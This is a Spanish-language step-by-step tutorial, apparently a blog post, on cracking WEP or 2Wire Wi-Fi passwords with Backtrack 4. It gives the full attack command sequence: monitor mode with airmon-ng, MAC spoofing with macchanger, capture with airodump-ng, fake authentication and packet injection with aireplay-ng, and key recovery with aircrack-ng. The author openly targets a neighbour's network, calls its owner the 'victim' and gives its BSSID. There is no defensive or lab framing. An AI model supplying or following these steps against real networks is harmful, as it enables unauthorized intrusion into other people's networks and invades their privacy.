Bien en lo siguiente daré un pequeño tuto de como Hackear redes WEP o 2wire con Backtrack 4.

Que necesitamos:

• La imagen de Backtrack 4, Descargar
• USB wireles Linksys WUSB54GC(Color Gris)
• Si no tienes la tarjeta antes mencionada verifica que la que piensas usar este soportada por Backtrack

Nota: Hay una nueva USB wireles Linksys WUSB54GC es de color negro, este tutorial no ha sido probado para esta nueva versión de chipset, según lectores indican que Backtrack 4 no reconoce el nuevo chipset de la Linksys WUSB54GC Negra.

Ya que descarguemos la imagen de Backtrack 4 podemos quemarlo en un CD(usarlo como live CD) o usar un virtualizador como virtualbox para montar la imagen, usen el que mas se le facilite.

Una vez dentro de Backtrack con nuestra memoria USB wireles Linksys WUSB54GC conectada abrimos una consola y ponemos lo siguiente para identificar nuestra interfaz de red.

airmon-ng

Después de identificada nuestra interfaz hacemos lo siguiente (en mi caso es wlan0), en la misma ventana ponemos

airmon-ng stop wlan0

y después

airmon-ng start wlan0

Con eso tendremos algo asi:

Después de eso, cambiamos la macaddress de nuetro dispositivo ponemos lo siguiente:

macchanger –m 00:11:22:33:44:55 wlan0

y veremos algo como esto:

Con lo anterior le cambiamos la macaddress de manera temporal a la USB wireles Linksys WUSB54GC para que sea mas fácil de recordar.

Después de eso en la misma consola ponemos lo siguiente

airodump-ng wlan0

Para escanear las redes que tenemos a nuestro alrededor, aparecerá algo como esto:

Donde notamos lo siguiente en mi caso hackeare la red de mi vecina adriana70 tenenmos que fijarnos en los siguientes datos el channel (Columna CH) y en la macaddress de nuestra víctima(columna BSSID) estos datos están señalados en la imagen anterior.

ahora en esa misma ventana precionamos ctrl+c, aparecera la linea de comando y ponemos la siguiente instrucción teniendo precaución de sustituir los datos entre comillas con la información de nuestra víctima.

airodump-ng -c "channel" -w guerrix --bssid "mac-a-atacar" wlan0

para el caso de mi víctima quedaría así:

airodump-ng -c 10 -w guerrix --bssid 00:1D:5A:19:05:11 wlan0

Donde “channel” lo sustituí por 10 y “mac-a-atacar” por 00:1D:5A:19:05:11, los datos de mi vecina. Una ve que damos enter veremos algo como esto:

El recuadro en rojo debajo de #DATA indica la cantidad de paquetes que hemos inyectado probablemente lo tengan en 0 o un numero demasiado bajo para cambiar eso hacemos lo siguiente:

Abrimos una nueva terminal sin cerrar la que teníamos, ponemos el siguiente comando teniendo cuidado de sustituir el texto entre comillas con los datos indicados:

aireplay-ng -1 0 -a "mac-a-tacar" -h "mi-mac" wlan0

Que dando algo asi, recuerden que al principio cambiamos nuestra mac por 00:11:22:33:44:55

aireplay-ng -1 0 -a 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0

al dar enter y si no tenemos ningun error ponemos el siguiente comando de igual manera teniendo cuidado de sustituir el texto entre comillas con los datos indicados:

aireplay-ng -3 -b "mac-a-tacar" -h "mi-mac" wlan0

En mi caso quedara:

aireplay-ng -3 -b 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0

Al dar enter a esta ultima instrucción notaremos que empezamos a inyectar los paquetes y si checamos la terminal que nos indica el #DATA veremos como ese valor se incrementa rápidamente:

Una vez que el valor de #DATA pase los 30000 paquetes abrimos otra terminal, sin cerrar las que tenemos abiertas y ponemos lo siguiente:
Nuevamente cuidado de sustituir lo que nos pide.

aircrack-ng -b "mac-a-atacar" guerrix-01.cap

En mi caso quedara así:

aircrack-ng -b 00:1D:5A:19:05:11 guerrix-01.cap

Después de dar enter si obtenemos un KEY FOUND! entonces felicidades han hackeado la red.

Pero de no ser asi no se mortifiquen esperen a que el #DATA incremente a 60000 e ingrecen de nuevo el comando anterior y si sigue fallando intenten a los 90000 y así dejen que se valla incrementando hasta que encuentren la clave. El tiempo que se emplee en descifrar la clave varia según la dificultad de esta ultima.